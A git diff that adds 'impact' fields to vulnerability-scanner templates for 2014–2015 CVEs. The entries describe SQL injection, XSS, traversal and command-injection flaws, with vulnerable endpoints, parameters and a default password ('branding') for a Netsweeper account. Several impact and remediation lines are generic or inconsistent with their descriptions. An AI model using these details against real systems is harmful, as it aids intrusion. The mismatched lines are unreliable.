@@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands with the privileges of the affected device, potentially leading to unauthorized access, data loss, or further compromise of the network. remediation: | Apply the latest firmware update provided by Seagate to patch the command injection vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml index ae1be6b91c..a81fa00f9f 100644 --- a/http/cves/2014/CVE-2014-3704.yaml +++ b/http/cves/2014/CVE-2014-3704.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: high description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Drupal application and its underlying database. remediation: Upgrade to Drupal core 7.32 or later. reference: - https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index f8682b9864..425e614e34 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml 
@@ -5,6 +5,8 @@ info: author: geeknik severity: high description: A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information. remediation: | Upgrade to a patched version of the st module or use an alternative module that is not vulnerable to directory traversal. reference: diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index ed1cc09291..170304b95f 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass network restrictions and access internal resources. remediation: | Apply the latest patches and updates provided by Oracle to fix the SSRF vulnerability reference: diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index bd377386a4..1e067c3be7 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Upgrade to a patched version of ActiveHelper LiveHelp Server or apply the necessary security patches to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index 8f2d0fe455..2bb0b95dd3 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions. remediation: | Update to the latest version of the Import Legacy Media plugin (0.1 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index 58b5bfde91..02455d1c92 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade Infusionsoft Gravity Forms Add-on to version 1.5.7 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 4dc93cd1e0..7696c096dd 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of the Movies plugin (version 0.7 or above) that addresses the XSS vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index d367d7a6ce..b59fd07b87 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the Podcast Channels plugin (0.28 or higher) to fix this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index 50c9d3dacb..51490ad8d3 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter. + impact: | + Allows remote attackers to inject arbitrary web script or HTML via crafted shortcode parameters, leading to potential session hijacking, defacement of web pages, or theft of sensitive information. remediation: | Update to the latest version of the Shortcode Ninja plugin (1.4 or higher) to fix the XSS vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index 41fdb0aff0..8d9194ad25 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to WooCommerce Swipe plugin version 2.7.2 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index f7e87c7031..7bcbba586f 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the plugin's output, potentially leading to the execution of arbitrary code or stealing sensitive information. remediation: | Upgrade to a patched version of the Ultimate Weather Plugin that addresses the XSS vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index 1840287d97..4edb95c6ac 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Update to the latest version of the Tera Charts plugin to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index f668c8fa04..c9ef1ee772 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function. + impact: | + An attacker can gain sensitive information from the target system. remediation: | Upgrade to WordPress EasyCart version 2.0.6 or later. reference: diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index b9393b690a..1a47626018 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/. + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks. remediation: | Apply the latest patches and updates provided by the vendor to fix the local file inclusion vulnerability in Fonality trixbox. reference: diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 34b7f96890..bb0ef436f0 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade to a patched version of webEdition or apply the necessary security patches to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 7940e9db3d..7d2b20c757 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information. remediation: | Update to the latest version of the WP Content Source Control plugin to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml index 6221e4c4db..4288ed7ec1 100644 --- a/http/cves/2014/CVE-2014-6271.yaml +++ b/http/cves/2014/CVE-2014-6271.yaml @@ -5,6 +5,8 @@ info: author: pentest_swissky,0xelkomy severity: critical description: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock. + impact: | + Remote code execution can lead to unauthorized access, data theft, and system compromise. remediation: | Apply the necessary patches and updates provided by the vendor to fix the vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index b3cf6ac4ce..19f9b82cf7 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | HTTP File Server before 2.3c is susceptible to remote command execution. The findMacroMarker function in parserLib.pas allows an attacker to execute arbitrary programs via a %00 sequence in a search action. Therefore, an attacker can obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: | Upgrade to the latest version of HTTP File Server (>=2.3c) to mitigate this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index 18c686dbd4..9e78c8a714 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation. remediation: | Upgrade to a patched version of Osclass (3.4.2 or later) to mitigate the vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index 5d4f4c111a..bf91ea2b47 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | SOPlanning <1.32 contain a directory traversal in the file_get_contents function via a .. (dot dot) in the fichier parameter. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Upgrade Simple Online Planning Tool to version 1.3.2 or higher to fix the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index be78e830b2..1752fff3a9 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK,daffainfo severity: high description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Apply the latest security patches and updates provided by the Gogs project to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index 54d4b7f104..efe5785054 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive files, potentially leading to further compromise of the server. remediation: | Update to the latest version of DukaPress plugin (2.5.3 or higher) which contains a fix for this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index 6199cfa084..199b65efe7 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress DZS-VideoGallery Plugin, which includes a fix for this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml index 961d60cf26..1acdcfc5d6 100644 --- a/http/cves/2014/CVE-2014-9119.yaml +++ b/http/cves/2014/CVE-2014-9119.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. + impact: | + Allows an attacker to read arbitrary files on the server. remediation: | Update WordPress DB Backup plugin to version 4.6 or higher. reference: diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index 9dc8fc2c8f..13395d8a96 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability. + impact: | + Allows remote attackers to inject arbitrary web script or HTML via a crafted file name, leading to potential session hijacking, defacement, or data theft. remediation: | Update to the latest version of the Frontend Uploader plugin (0.9.2) or apply the vendor-supplied patch to fix the vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index d160d3aa60..b308aa0b47 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index dd8558cb5d..38157518a4 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index 8c996fff52..c5d2e058ec 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml index fd452bcc1c..1068403102 100644 --- a/http/cves/2014/CVE-2014-9609.yaml +++ b/http/cves/2014/CVE-2014-9609.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action. + impact: | + An attacker can read, modify, or delete arbitrary files on the server, potentially leading to unauthorized access, data leakage, or system compromise. remediation: | Upgrade to a patched version of Netsweeper or apply the necessary security patches to fix the directory traversal vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index 0d67065af3..58467ad6c8 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: The Web Panel in Netsweeper before 4.0.5 has a default password of 'branding' for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/. + impact: | + An attacker can gain unauthorized access to the Netsweeper 4.0.5 system using the default weak account. remediation: | Change the default credentials to strong and unique ones. reference: diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index 642c6bb209..dcf3b42a41 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index b55457effa..14495e9a1c 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: An open redirect vulnerability in remotereporter/load_logfiles.php in Netsweeper before 4.0.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the download of malware. remediation: | Apply the latest security patches or updates provided by the vendor to fix the open redirection vulnerability. reference: diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index 5e985faeaa..8a00c665d6 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Netsweeper. reference: diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index 7cffd109d6..4d6671086c 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the router. remediation: | Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index d4c3cf6cf2..3a6dedf76c 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Update to the latest version of the plugin. reference: diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml index 61b0e64116..c3a61aca98 100644 --- a/http/cves/2015/CVE-2015-1000010.yaml +++ b/http/cves/2015/CVE-2015-1000010.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server. remediation: | Update to the latest version of the WordPress Simple Image Manipulator plugin. reference: 
diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index efe1e33d5d..24aff99209 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability. + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or gain unauthorized access to the server. remediation: | Update to the latest version of the MyPixs plugin (>=0.4) or apply the vendor-provided patch to fix the LFI vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index d399110245..8941d687b4 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches and updates provided by ElasticSearch to fix the deserialization vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index b380e3ac89..f81971f461 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation. remediation: | Upgrade IceWarp Mail Server to version 11.1.1 or above to mitigate the directory traversal vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index 7ff4adfddd..7df8d394e5 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734. + impact: | + An attacker can read arbitrary files on the server, potentially exposing sensitive information. remediation: | Update the WordPress Slider Revolution plugin to the latest version to fix the vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index 7f01c95b62..652e36911c 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Fortinet FortiOS to a version higher than 5.2.3 to mitigate this vulnerability. reference: diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index 2af232eb45..5946ef6932 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server. remediation: | Apply the latest security patches and updates provided by Magento. reference: diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index 706a718ccd..10874acdd6 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml 
